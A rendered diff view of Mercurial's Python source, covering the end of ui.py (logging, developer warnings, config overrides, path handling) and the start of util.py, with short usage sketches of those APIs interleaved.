1958 """Install logger which can be identified later by the given name
1959
1959
1960 More than one logger can be registered. Use extension or module
1960 More than one logger can be registered. Use extension or module
1961 name to uniquely identify the logger instance.
1961 name to uniquely identify the logger instance.
1962 """
1962 """
1963 self._loggers[name] = logger
1963 self._loggers[name] = logger
1964
1964
1965 def log(self, event, msgfmt, *msgargs, **opts):
1965 def log(self, event, msgfmt, *msgargs, **opts):
1966 '''hook for logging facility extensions
1966 '''hook for logging facility extensions
1967
1967
1968 event should be a readily-identifiable subsystem, which will
1968 event should be a readily-identifiable subsystem, which will
1969 allow filtering.
1969 allow filtering.
1970
1970
1971 msgfmt should be a newline-terminated format string to log, and
1971 msgfmt should be a newline-terminated format string to log, and
1972 *msgargs are %-formatted into it.
1972 *msgargs are %-formatted into it.
1973
1973
1974 **opts currently has no defined meanings.
1974 **opts currently has no defined meanings.
1975 '''
1975 '''
1976 if not self._loggers:
1976 if not self._loggers:
1977 return
1977 return
1978 activeloggers = [
1978 activeloggers = [
1979 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
1979 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
1980 ]
1980 ]
1981 if not activeloggers:
1981 if not activeloggers:
1982 return
1982 return
1983 msg = msgfmt % msgargs
1983 msg = msgfmt % msgargs
1984 opts = pycompat.byteskwargs(opts)
1984 opts = pycompat.byteskwargs(opts)
1985 # guard against recursion from e.g. ui.debug()
1985 # guard against recursion from e.g. ui.debug()
1986 registeredloggers = self._loggers
1986 registeredloggers = self._loggers
1987 self._loggers = {}
1987 self._loggers = {}
1988 try:
1988 try:
1989 for logger in activeloggers:
1989 for logger in activeloggers:
1990 logger.log(self, event, msg, opts)
1990 logger.log(self, event, msg, opts)
1991 finally:
1991 finally:
1992 self._loggers = registeredloggers
1992 self._loggers = registeredloggers
1993
1993
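# A minimal sketch of the logger protocol expected by setlogger()/log():
# a logger provides tracked(event) and log(ui, event, msg, opts).  Assumes
# Mercurial is importable; the logger class and event name are made up for
# illustration.
from mercurial import ui as uimod

class printlogger(object):
    def tracked(self, event):
        return event == b'example'

    def log(self, ui, event, msg, opts):
        ui.write_err(b'[%s] %s' % (event, msg))

myui = uimod.ui.load()
myui.setlogger(b'example-logger', printlogger())
myui.log(b'example', b'%d items processed\n', 42)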
1994 def label(self, msg, label):
1994 def label(self, msg, label):
1995 '''style msg based on supplied label
1995 '''style msg based on supplied label
1996
1996
1997 If some color mode is enabled, this will add the necessary control
1997 If some color mode is enabled, this will add the necessary control
1998 characters to apply such color. In addition, 'debug' color mode adds
1998 characters to apply such color. In addition, 'debug' color mode adds
1999 markup showing which label affects a piece of text.
1999 markup showing which label affects a piece of text.
2000
2000
2001 ui.write(s, 'label') is equivalent to
2001 ui.write(s, 'label') is equivalent to
2002 ui.write(ui.label(s, 'label')).
2002 ui.write(ui.label(s, 'label')).
2003 '''
2003 '''
2004 if self._colormode is not None:
2004 if self._colormode is not None:
2005 return color.colorlabel(self, msg, label)
2005 return color.colorlabel(self, msg, label)
2006 return msg
2006 return msg
2007
2007
2008 def develwarn(self, msg, stacklevel=1, config=None):
2008 def develwarn(self, msg, stacklevel=1, config=None):
2009 """issue a developer warning message
2009 """issue a developer warning message
2010
2010
2011 Use 'stacklevel' to report the offender some layers further up in the
2011 Use 'stacklevel' to report the offender some layers further up in the
2012 stack.
2012 stack.
2013 """
2013 """
2014 if not self.configbool(b'devel', b'all-warnings'):
2014 if not self.configbool(b'devel', b'all-warnings'):
2015 if config is None or not self.configbool(b'devel', config):
2015 if config is None or not self.configbool(b'devel', config):
2016 return
2016 return
2017 msg = b'devel-warn: ' + msg
2017 msg = b'devel-warn: ' + msg
2018 stacklevel += 1 # get in develwarn
2018 stacklevel += 1 # get in develwarn
2019 if self.tracebackflag:
2019 if self.tracebackflag:
2020 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2020 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2021 self.log(
2021 self.log(
2022 b'develwarn',
2022 b'develwarn',
2023 b'%s at:\n%s'
2023 b'%s at:\n%s'
2024 % (msg, b''.join(util.getstackframes(stacklevel))),
2024 % (msg, b''.join(util.getstackframes(stacklevel))),
2025 )
2025 )
2026 else:
2026 else:
2027 curframe = inspect.currentframe()
2027 curframe = inspect.currentframe()
2028 calframe = inspect.getouterframes(curframe, 2)
2028 calframe = inspect.getouterframes(curframe, 2)
2029 fname, lineno, fmsg = calframe[stacklevel][1:4]
2029 fname, lineno, fmsg = calframe[stacklevel][1:4]
2030 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2030 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2031 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2031 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2032 self.log(
2032 self.log(
2033 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2033 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2034 )
2034 )
2035
2035
2036 # avoid cycles
2036 # avoid cycles
2037 del curframe
2037 del curframe
2038 del calframe
2038 del calframe
2039
2039
2040 def deprecwarn(self, msg, version, stacklevel=2):
2040 def deprecwarn(self, msg, version, stacklevel=2):
2041 """issue a deprecation warning
2041 """issue a deprecation warning
2042
2042
2043 - msg: message explaining what is deprecated and how to upgrade,
2043 - msg: message explaining what is deprecated and how to upgrade,
2044 - version: last version where the API will be supported,
2044 - version: last version where the API will be supported,
2045 """
2045 """
2046 if not (
2046 if not (
2047 self.configbool(b'devel', b'all-warnings')
2047 self.configbool(b'devel', b'all-warnings')
2048 or self.configbool(b'devel', b'deprec-warn')
2048 or self.configbool(b'devel', b'deprec-warn')
2049 ):
2049 ):
2050 return
2050 return
2051 msg += (
2051 msg += (
2052 b"\n(compatibility will be dropped after Mercurial-%s,"
2052 b"\n(compatibility will be dropped after Mercurial-%s,"
2053 b" update your code.)"
2053 b" update your code.)"
2054 ) % version
2054 ) % version
2055 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2055 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2056
2056
2057 def exportableenviron(self):
2057 def exportableenviron(self):
2058 """The environment variables that are safe to export, e.g. through
2058 """The environment variables that are safe to export, e.g. through
2059 hgweb.
2059 hgweb.
2060 """
2060 """
2061 return self._exportableenviron
2061 return self._exportableenviron
2062
2062
2063 @contextlib.contextmanager
2063 @contextlib.contextmanager
2064 def configoverride(self, overrides, source=b""):
2064 def configoverride(self, overrides, source=b""):
2065 """Context manager for temporary config overrides
2065 """Context manager for temporary config overrides
2066 `overrides` must be a dict of the following structure:
2066 `overrides` must be a dict of the following structure:
2067 {(section, name) : value}"""
2067 {(section, name) : value}"""
2068 backups = {}
2068 backups = {}
2069 try:
2069 try:
2070 for (section, name), value in overrides.items():
2070 for (section, name), value in overrides.items():
2071 backups[(section, name)] = self.backupconfig(section, name)
2071 backups[(section, name)] = self.backupconfig(section, name)
2072 self.setconfig(section, name, value, source)
2072 self.setconfig(section, name, value, source)
2073 yield
2073 yield
2074 finally:
2074 finally:
2075 for __, backup in backups.items():
2075 for __, backup in backups.items():
2076 self.restoreconfig(backup)
2076 self.restoreconfig(backup)
2077 # just restoring ui.quiet config to the previous value is not enough
2077 # just restoring ui.quiet config to the previous value is not enough
2078 # as it does not update ui.quiet class member
2078 # as it does not update ui.quiet class member
2079 if (b'ui', b'quiet') in overrides:
2079 if (b'ui', b'quiet') in overrides:
2080 self.fixconfig(section=b'ui')
2080 self.fixconfig(section=b'ui')
2081
2081
2082
2082
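# A minimal sketch of configoverride(): the {(section, name): value}
# overrides apply for the duration of the with-block and are restored
# afterwards (including the ui.quiet class member).  Assumes Mercurial is
# importable; the overridden values are illustrative.
from mercurial import ui as uimod

myui = uimod.ui.load()
overrides = {(b'ui', b'quiet'): True, (b'ui', b'username'): b'example user'}
with myui.configoverride(overrides, source=b'example'):
    print(myui.quiet)                       # True inside the block
    print(myui.config(b'ui', b'username'))  # b'example user'
print(myui.quiet)                           # previous value restored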
2083 class paths(dict):
2083 class paths(dict):
2084 """Represents a collection of paths and their configs.
2084 """Represents a collection of paths and their configs.
2085
2085
2086 Data is initially derived from ui instances and the config files they have
2086 Data is initially derived from ui instances and the config files they have
2087 loaded.
2087 loaded.
2088 """
2088 """
2089
2089
2090 def __init__(self, ui):
2090 def __init__(self, ui):
2091 dict.__init__(self)
2091 dict.__init__(self)
2092
2092
2093 for name, loc in ui.configitems(b'paths', ignoresub=True):
2093 for name, loc in ui.configitems(b'paths', ignoresub=True):
2094 # No location is the same as not existing.
2094 # No location is the same as not existing.
2095 if not loc:
2095 if not loc:
2096 continue
2096 continue
2097 loc, sub = ui.configsuboptions(b'paths', name)
2097 loc, sub = ui.configsuboptions(b'paths', name)
2098 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
2098 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
2099
2099
2100 def getpath(self, name, default=None):
2100 def getpath(self, name, default=None):
2101 """Return a ``path`` from a string, falling back to default.
2101 """Return a ``path`` from a string, falling back to default.
2102
2102
2103 ``name`` can be a named path or a location. Locations are filesystem
2103 ``name`` can be a named path or a location. Locations are filesystem
2104 paths or URIs.
2104 paths or URIs.
2105
2105
2106 Returns None if ``name`` is not a registered path, a URI, or a local
2106 Returns None if ``name`` is not a registered path, a URI, or a local
2107 path to a repo.
2107 path to a repo.
2108 """
2108 """
2109 # Only fall back to default if no path was requested.
2109 # Only fall back to default if no path was requested.
2110 if name is None:
2110 if name is None:
2111 if not default:
2111 if not default:
2112 default = ()
2112 default = ()
2113 elif not isinstance(default, (tuple, list)):
2113 elif not isinstance(default, (tuple, list)):
2114 default = (default,)
2114 default = (default,)
2115 for k in default:
2115 for k in default:
2116 try:
2116 try:
2117 return self[k]
2117 return self[k]
2118 except KeyError:
2118 except KeyError:
2119 continue
2119 continue
2120 return None
2120 return None
2121
2121
2122 # Most likely empty string.
2122 # Most likely empty string.
2123 # This may need to raise in the future.
2123 # This may need to raise in the future.
2124 if not name:
2124 if not name:
2125 return None
2125 return None
2126
2126
2127 try:
2127 try:
2128 return self[name]
2128 return self[name]
2129 except KeyError:
2129 except KeyError:
2130 # Try to resolve as a local path or URI.
2130 # Try to resolve as a local path or URI.
2131 try:
2131 try:
2132 # We don't pass sub-options in, so no need to pass ui instance.
2132 # We don't pass sub-options in, so no need to pass ui instance.
2133 return path(None, None, rawloc=name)
2133 return path(None, None, rawloc=name)
2134 except ValueError:
2134 except ValueError:
2135 raise error.RepoError(_(b'repository %s does not exist') % name)
2135 raise error.RepoError(_(b'repository %s does not exist') % name)
2136
2136
2137
2137
2138 _pathsuboptions = {}
2138 _pathsuboptions = {}
2139
2139
2140
2140
2141 def pathsuboption(option, attr):
2141 def pathsuboption(option, attr):
2142 """Decorator used to declare a path sub-option.
2142 """Decorator used to declare a path sub-option.
2143
2143
2144 Arguments are the sub-option name and the attribute it should set on
2144 Arguments are the sub-option name and the attribute it should set on
2145 ``path`` instances.
2145 ``path`` instances.
2146
2146
2147 The decorated function will receive as arguments a ``ui`` instance,
2147 The decorated function will receive as arguments a ``ui`` instance,
2148 ``path`` instance, and the string value of this option from the config.
2148 ``path`` instance, and the string value of this option from the config.
2149 The function should return the value that will be set on the ``path``
2149 The function should return the value that will be set on the ``path``
2150 instance.
2150 instance.
2151
2151
2152 This decorator can be used to perform additional verification of
2152 This decorator can be used to perform additional verification of
2153 sub-options and to change the type of sub-options.
2153 sub-options and to change the type of sub-options.
2154 """
2154 """
2155
2155
2156 def register(func):
2156 def register(func):
2157 _pathsuboptions[option] = (attr, func)
2157 _pathsuboptions[option] = (attr, func)
2158 return func
2158 return func
2159
2159
2160 return register
2160 return register
2161
2161
2162
2162
2163 @pathsuboption(b'pushurl', b'pushloc')
2163 @pathsuboption(b'pushurl', b'pushloc')
2164 def pushurlpathoption(ui, path, value):
2164 def pushurlpathoption(ui, path, value):
2165 u = util.url(value)
2165 u = util.url(value)
2166 # Actually require a URL.
2166 # Actually require a URL.
2167 if not u.scheme:
2167 if not u.scheme:
2168 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2168 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2169 return None
2169 return None
2170
2170
2171 # Don't support the #foo syntax in the push URL to declare branch to
2171 # Don't support the #foo syntax in the push URL to declare branch to
2172 # push.
2172 # push.
2173 if u.fragment:
2173 if u.fragment:
2174 ui.warn(
2174 ui.warn(
2175 _(
2175 _(
2176 b'("#fragment" in paths.%s:pushurl not supported; '
2176 b'("#fragment" in paths.%s:pushurl not supported; '
2177 b'ignoring)\n'
2177 b'ignoring)\n'
2178 )
2178 )
2179 % path.name
2179 % path.name
2180 )
2180 )
2181 u.fragment = None
2181 u.fragment = None
2182
2182
2183 return bytes(u)
2183 return bytes(u)
2184
2184
2185
2185
2186 @pathsuboption(b'pushrev', b'pushrev')
2186 @pathsuboption(b'pushrev', b'pushrev')
2187 def pushrevpathoption(ui, path, value):
2187 def pushrevpathoption(ui, path, value):
2188 return value
2188 return value
2189
2189
2190
2190
2191 class path(object):
2191 class path(object):
2192 """Represents an individual path and its configuration."""
2192 """Represents an individual path and its configuration."""
2193
2193
2194 def __init__(self, ui, name, rawloc=None, suboptions=None):
2194 def __init__(self, ui, name, rawloc=None, suboptions=None):
2195 """Construct a path from its config options.
2195 """Construct a path from its config options.
2196
2196
2197 ``ui`` is the ``ui`` instance the path is coming from.
2197 ``ui`` is the ``ui`` instance the path is coming from.
2198 ``name`` is the symbolic name of the path.
2198 ``name`` is the symbolic name of the path.
2199 ``rawloc`` is the raw location, as defined in the config.
2199 ``rawloc`` is the raw location, as defined in the config.
2200 ``pushloc`` is the raw location pushes should be made to.
2200 ``pushloc`` is the raw location pushes should be made to.
2201
2201
2202 If ``name`` is not defined, we require that the location be a) a local
2202 If ``name`` is not defined, we require that the location be a) a local
2203 filesystem path with a .hg directory or b) a URL. If not,
2203 filesystem path with a .hg directory or b) a URL. If not,
2204 ``ValueError`` is raised.
2204 ``ValueError`` is raised.
2205 """
2205 """
2206 if not rawloc:
2206 if not rawloc:
2207 raise ValueError(b'rawloc must be defined')
2207 raise ValueError(b'rawloc must be defined')
2208
2208
2209 # Locations may define branches via syntax <base>#<branch>.
2209 # Locations may define branches via syntax <base>#<branch>.
2210 u = util.url(rawloc)
2210 u = util.url(rawloc)
2211 branch = None
2211 branch = None
2212 if u.fragment:
2212 if u.fragment:
2213 branch = u.fragment
2213 branch = u.fragment
2214 u.fragment = None
2214 u.fragment = None
2215
2215
2216 self.url = u
2216 self.url = u
2217 self.branch = branch
2217 self.branch = branch
2218
2218
2219 self.name = name
2219 self.name = name
2220 self.rawloc = rawloc
2220 self.rawloc = rawloc
2221 self.loc = b'%s' % u
2221 self.loc = b'%s' % u
2222
2222
2223 # When given a raw location but not a symbolic name, check that the
2223 # When given a raw location but not a symbolic name, check that the
2224 # location is valid.
2224 # location is valid.
2225 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
2225 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
2226 raise ValueError(
2226 raise ValueError(
2227 b'location is not a URL or path to a local '
2227 b'location is not a URL or path to a local '
2228 b'repo: %s' % rawloc
2228 b'repo: %s' % rawloc
2229 )
2229 )
2230
2230
2231 suboptions = suboptions or {}
2231 suboptions = suboptions or {}
2232
2232
2233 # Now process the sub-options. If a sub-option is registered, its
2233 # Now process the sub-options. If a sub-option is registered, its
2234 # attribute will always be present. The value will be None if there
2234 # attribute will always be present. The value will be None if there
2235 # was no valid sub-option.
2235 # was no valid sub-option.
2236 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2236 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2237 if suboption not in suboptions:
2237 if suboption not in suboptions:
2238 setattr(self, attr, None)
2238 setattr(self, attr, None)
2239 continue
2239 continue
2240
2240
2241 value = func(ui, self, suboptions[suboption])
2241 value = func(ui, self, suboptions[suboption])
2242 setattr(self, attr, value)
2242 setattr(self, attr, value)
2243
2243
2244 def _isvalidlocalpath(self, path):
2244 def _isvalidlocalpath(self, path):
2245 """Returns True if the given path is a potentially valid repository.
2245 """Returns True if the given path is a potentially valid repository.
2246 This is its own function so that extensions can change the definition of
2246 This is its own function so that extensions can change the definition of
2247 'valid' in this case (like when pulling from a git repo into a hg
2247 'valid' in this case (like when pulling from a git repo into a hg
2248 one)."""
2248 one)."""
2249 try:
2249 try:
2250 return os.path.isdir(os.path.join(path, b'.hg'))
2250 return os.path.isdir(os.path.join(path, b'.hg'))
2251 # Python 2 may return TypeError. Python 3, ValueError.
2251 # Python 2 may return TypeError. Python 3, ValueError.
2252 except (TypeError, ValueError):
2252 except (TypeError, ValueError):
2253 return False
2253 return False
2254
2254
2255 @property
2255 @property
2256 def suboptions(self):
2256 def suboptions(self):
2257 """Return sub-options and their values for this path.
2257 """Return sub-options and their values for this path.
2258
2258
2259 This is intended to be used for presentation purposes.
2259 This is intended to be used for presentation purposes.
2260 """
2260 """
2261 d = {}
2261 d = {}
2262 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2262 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2263 value = getattr(self, attr)
2263 value = getattr(self, attr)
2264 if value is not None:
2264 if value is not None:
2265 d[subopt] = value
2265 d[subopt] = value
2266 return d
2266 return d
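
# A minimal usage sketch for the class above, assuming the mercurial package
# is importable and using made-up repository URLs; it shows how the
# registered `pushurl` sub-option ends up on the `pushloc` attribute.

from mercurial import ui as uimod

u = uimod.ui.load()
p = uimod.path(
    u,
    b'upstream',
    rawloc=b'https://example.com/repo',
    suboptions={b'pushurl': b'ssh://example.com/repo'},
)
print(p.loc)         # b'https://example.com/repo'
print(p.pushloc)     # b'ssh://example.com/repo', set by pushurlpathoption()
print(p.suboptions)  # {b'pushurl': b'ssh://example.com/repo'}
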
2267
2267
2268
2268
2269 # we instantiate one globally shared progress bar to avoid
2269 # we instantiate one globally shared progress bar to avoid
2270 # competing progress bars when multiple UI objects get created
2270 # competing progress bars when multiple UI objects get created
2271 _progresssingleton = None
2271 _progresssingleton = None
2272
2272
2273
2273
2274 def getprogbar(ui):
2274 def getprogbar(ui):
2275 global _progresssingleton
2275 global _progresssingleton
2276 if _progresssingleton is None:
2276 if _progresssingleton is None:
2277 # passing the 'ui' object to the singleton is fishy,
2277 # passing the 'ui' object to the singleton is fishy,
2278 # this is how the extension used to work, but feel free to rework it.
2278 # this is how the extension used to work, but feel free to rework it.
2279 _progresssingleton = progress.progbar(ui)
2279 _progresssingleton = progress.progbar(ui)
2280 return _progresssingleton
2280 return _progresssingleton
2281
2281
2282
2282
2283 def haveprogbar():
2283 def haveprogbar():
2284 return _progresssingleton is not None
2284 return _progresssingleton is not None
2285
2285
2286
2286
2287 def _selectmsgdests(ui):
2287 def _selectmsgdests(ui):
2288 name = ui.config(b'ui', b'message-output')
2288 name = ui.config(b'ui', b'message-output')
2289 if name == b'channel':
2289 if name == b'channel':
2290 if ui.fmsg:
2290 if ui.fmsg:
2291 return ui.fmsg, ui.fmsg
2291 return ui.fmsg, ui.fmsg
2292 else:
2292 else:
2293 # fall back to ferr if channel isn't ready so that status/error
2293 # fall back to ferr if channel isn't ready so that status/error
2294 # messages can be printed
2294 # messages can be printed
2295 return ui.ferr, ui.ferr
2295 return ui.ferr, ui.ferr
2296 if name == b'stdio':
2296 if name == b'stdio':
2297 return ui.fout, ui.ferr
2297 return ui.fout, ui.ferr
2298 if name == b'stderr':
2298 if name == b'stderr':
2299 return ui.ferr, ui.ferr
2299 return ui.ferr, ui.ferr
2300 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2300 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
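
# For illustration only, a sketch of driving the selection above through
# configuration; it relies on the private helper, so it is a test-style
# snippet rather than a public API example.

from mercurial import ui as uimod

u = uimod.ui.load()
u.setconfig(b'ui', b'message-output', b'stderr')
fout, ferr = uimod._selectmsgdests(u)
assert fout is u.ferr and ferr is u.ferr
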
2301
2301
2302
2302
2303 def _writemsgwith(write, dest, *args, **opts):
2303 def _writemsgwith(write, dest, *args, **opts):
2304 """Write ui message with the given ui._write*() function
2304 """Write ui message with the given ui._write*() function
2305
2305
2306 The specified message type is translated to the 'ui.<type>' label if the dest
2306 The specified message type is translated to the 'ui.<type>' label if the dest
2307 isn't a structured channel, so that the message will be colorized.
2307 isn't a structured channel, so that the message will be colorized.
2308 """
2308 """
2309 # TODO: maybe change 'type' to a mandatory option
2309 # TODO: maybe change 'type' to a mandatory option
2310 if 'type' in opts and not getattr(dest, 'structured', False):
2310 if 'type' in opts and not getattr(dest, 'structured', False):
2311 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2311 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2312 write(dest, *args, **opts)
2312 write(dest, *args, **opts)
@@ -1,3611 +1,3611 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import mmap
25 import mmap
26 import os
26 import os
27 import platform as pyplatform
27 import platform as pyplatform
28 import re as remod
28 import re as remod
29 import shutil
29 import shutil
30 import socket
30 import socket
31 import stat
31 import stat
32 import sys
32 import sys
33 import time
33 import time
34 import traceback
34 import traceback
35 import warnings
35 import warnings
36
36
37 from .thirdparty import attr
37 from .thirdparty import attr
38 from .pycompat import (
38 from .pycompat import (
39 delattr,
39 delattr,
40 getattr,
40 getattr,
41 open,
41 open,
42 setattr,
42 setattr,
43 )
43 )
44 from hgdemandimport import tracing
44 from hgdemandimport import tracing
45 from . import (
45 from . import (
46 encoding,
46 encoding,
47 error,
47 error,
48 i18n,
48 i18n,
49 node as nodemod,
49 node as nodemod,
50 policy,
50 policy,
51 pycompat,
51 pycompat,
52 urllibcompat,
52 urllibcompat,
53 )
53 )
54 from .utils import (
54 from .utils import (
55 compression,
55 compression,
56 procutil,
56 procutil,
57 stringutil,
57 stringutil,
58 )
58 )
59
59
60 base85 = policy.importmod('base85')
60 base85 = policy.importmod('base85')
61 osutil = policy.importmod('osutil')
61 osutil = policy.importmod('osutil')
62
62
63 b85decode = base85.b85decode
63 b85decode = base85.b85decode
64 b85encode = base85.b85encode
64 b85encode = base85.b85encode
65
65
66 cookielib = pycompat.cookielib
66 cookielib = pycompat.cookielib
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 safehasattr = pycompat.safehasattr
69 safehasattr = pycompat.safehasattr
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 bytesio = pycompat.bytesio
71 bytesio = pycompat.bytesio
72 # TODO deprecate stringio name, as it is a lie on Python 3.
72 # TODO deprecate stringio name, as it is a lie on Python 3.
73 stringio = bytesio
73 stringio = bytesio
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 httpserver = urllibcompat.httpserver
76 httpserver = urllibcompat.httpserver
77 urlerr = urllibcompat.urlerr
77 urlerr = urllibcompat.urlerr
78 urlreq = urllibcompat.urlreq
78 urlreq = urllibcompat.urlreq
79
79
80 # workaround for win32mbcs
80 # workaround for win32mbcs
81 _filenamebytestr = pycompat.bytestr
81 _filenamebytestr = pycompat.bytestr
82
82
83 if pycompat.iswindows:
83 if pycompat.iswindows:
84 from . import windows as platform
84 from . import windows as platform
85 else:
85 else:
86 from . import posix as platform
86 from . import posix as platform
87
87
88 _ = i18n._
88 _ = i18n._
89
89
90 bindunixsocket = platform.bindunixsocket
90 bindunixsocket = platform.bindunixsocket
91 cachestat = platform.cachestat
91 cachestat = platform.cachestat
92 checkexec = platform.checkexec
92 checkexec = platform.checkexec
93 checklink = platform.checklink
93 checklink = platform.checklink
94 copymode = platform.copymode
94 copymode = platform.copymode
95 expandglobs = platform.expandglobs
95 expandglobs = platform.expandglobs
96 getfsmountpoint = platform.getfsmountpoint
96 getfsmountpoint = platform.getfsmountpoint
97 getfstype = platform.getfstype
97 getfstype = platform.getfstype
98 groupmembers = platform.groupmembers
98 groupmembers = platform.groupmembers
99 groupname = platform.groupname
99 groupname = platform.groupname
100 isexec = platform.isexec
100 isexec = platform.isexec
101 isowner = platform.isowner
101 isowner = platform.isowner
102 listdir = osutil.listdir
102 listdir = osutil.listdir
103 localpath = platform.localpath
103 localpath = platform.localpath
104 lookupreg = platform.lookupreg
104 lookupreg = platform.lookupreg
105 makedir = platform.makedir
105 makedir = platform.makedir
106 nlinks = platform.nlinks
106 nlinks = platform.nlinks
107 normpath = platform.normpath
107 normpath = platform.normpath
108 normcase = platform.normcase
108 normcase = platform.normcase
109 normcasespec = platform.normcasespec
109 normcasespec = platform.normcasespec
110 normcasefallback = platform.normcasefallback
110 normcasefallback = platform.normcasefallback
111 openhardlinks = platform.openhardlinks
111 openhardlinks = platform.openhardlinks
112 oslink = platform.oslink
112 oslink = platform.oslink
113 parsepatchoutput = platform.parsepatchoutput
113 parsepatchoutput = platform.parsepatchoutput
114 pconvert = platform.pconvert
114 pconvert = platform.pconvert
115 poll = platform.poll
115 poll = platform.poll
116 posixfile = platform.posixfile
116 posixfile = platform.posixfile
117 readlink = platform.readlink
117 readlink = platform.readlink
118 rename = platform.rename
118 rename = platform.rename
119 removedirs = platform.removedirs
119 removedirs = platform.removedirs
120 samedevice = platform.samedevice
120 samedevice = platform.samedevice
121 samefile = platform.samefile
121 samefile = platform.samefile
122 samestat = platform.samestat
122 samestat = platform.samestat
123 setflags = platform.setflags
123 setflags = platform.setflags
124 split = platform.split
124 split = platform.split
125 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
125 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
126 statisexec = platform.statisexec
126 statisexec = platform.statisexec
127 statislink = platform.statislink
127 statislink = platform.statislink
128 umask = platform.umask
128 umask = platform.umask
129 unlink = platform.unlink
129 unlink = platform.unlink
130 username = platform.username
130 username = platform.username
131
131
132 # small compat layer
132 # small compat layer
133 compengines = compression.compengines
133 compengines = compression.compengines
134 SERVERROLE = compression.SERVERROLE
134 SERVERROLE = compression.SERVERROLE
135 CLIENTROLE = compression.CLIENTROLE
135 CLIENTROLE = compression.CLIENTROLE
136
136
137 try:
137 try:
138 recvfds = osutil.recvfds
138 recvfds = osutil.recvfds
139 except AttributeError:
139 except AttributeError:
140 pass
140 pass
141
141
142 # Python compatibility
142 # Python compatibility
143
143
144 _notset = object()
144 _notset = object()
145
145
146
146
147 def bitsfrom(container):
147 def bitsfrom(container):
148 bits = 0
148 bits = 0
149 for bit in container:
149 for bit in container:
150 bits |= bit
150 bits |= bit
151 return bits
151 return bits
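
# A tiny illustrative check of the helper above; the bit values are arbitrary.

from mercurial import util

assert util.bitsfrom([0b001, 0b010, 0b100]) == 0b111
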
152
152
153
153
154 # Python 2.6 still has deprecation warnings enabled by default. We do not want
154 # Python 2.6 still has deprecation warnings enabled by default. We do not want
155 # to display anything to the standard user, so detect whether we are running
155 # to display anything to the standard user, so detect whether we are running
156 # the test suite and only enable Python deprecation warnings in that case.
156 # the test suite and only enable Python deprecation warnings in that case.
157 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
157 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
158 if _dowarn:
158 if _dowarn:
159 # explicitly unfilter our warning for python 2.7
159 # explicitly unfilter our warning for python 2.7
160 #
160 #
161 # The option of setting PYTHONWARNINGS in the test runner was investigated.
161 # The option of setting PYTHONWARNINGS in the test runner was investigated.
162 # However, a module name set through PYTHONWARNINGS is matched exactly, so
162 # However, a module name set through PYTHONWARNINGS is matched exactly, so
163 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
163 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
164 # makes the whole PYTHONWARNINGS approach useless for our use case.
164 # makes the whole PYTHONWARNINGS approach useless for our use case.
165 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
165 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
166 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
166 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
167 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
167 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
168 if _dowarn and pycompat.ispy3:
168 if _dowarn and pycompat.ispy3:
169 # silence warning emitted by passing user string to re.sub()
